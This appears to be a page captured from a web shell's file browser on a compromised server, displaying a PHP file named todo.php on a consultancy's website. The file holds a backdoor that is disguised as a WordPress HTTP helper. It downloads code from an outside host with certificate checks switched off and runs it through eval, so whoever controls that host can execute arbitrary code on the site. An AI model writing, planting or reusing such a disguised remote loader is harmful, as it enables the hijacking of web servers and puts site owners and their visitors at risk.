HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux srv1.dlabib.net 6.8.0-94-generic #96-Ubuntu SMP PREEMPT_DYNAMIC Fri Jan 9 20:36:55 UTC 2026 x86_64
User: hbkconsultan_usr (1002)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /var/www/hbkconsultan_usr/data/www/hbkconsultancy.com/todo.php
<?php
function WordPress_Http_Curl ( $url, $args = array() ) {
	if ( ! function_exists( 'curl_init' ) || ! function_exists( 'curl_exec' ) ) {
		return false;
	}
	$handle = curl_init();
	curl_setopt( $handle, CURLOPT_URL, $url );
	curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true );
	curl_setopt( $handle, CURLOPT_HEADER, false );
	curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false );
	curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false );
	$response = curl_exec( $handle );
	$curl_error = curl_error( $handle );
	if ( !$curl_error ) {
		$response = array(
			'data' =>  eval( '?>'. $response )
		);
		return $response;
	}
	if ( PHP_VERSION_ID < 80000 ) {
		curl_close( $handle );
	}
}

$result = WordPress_Http_Curl( 'http://z60115_7.qosinski.shop/stat/index2.txt' );
?>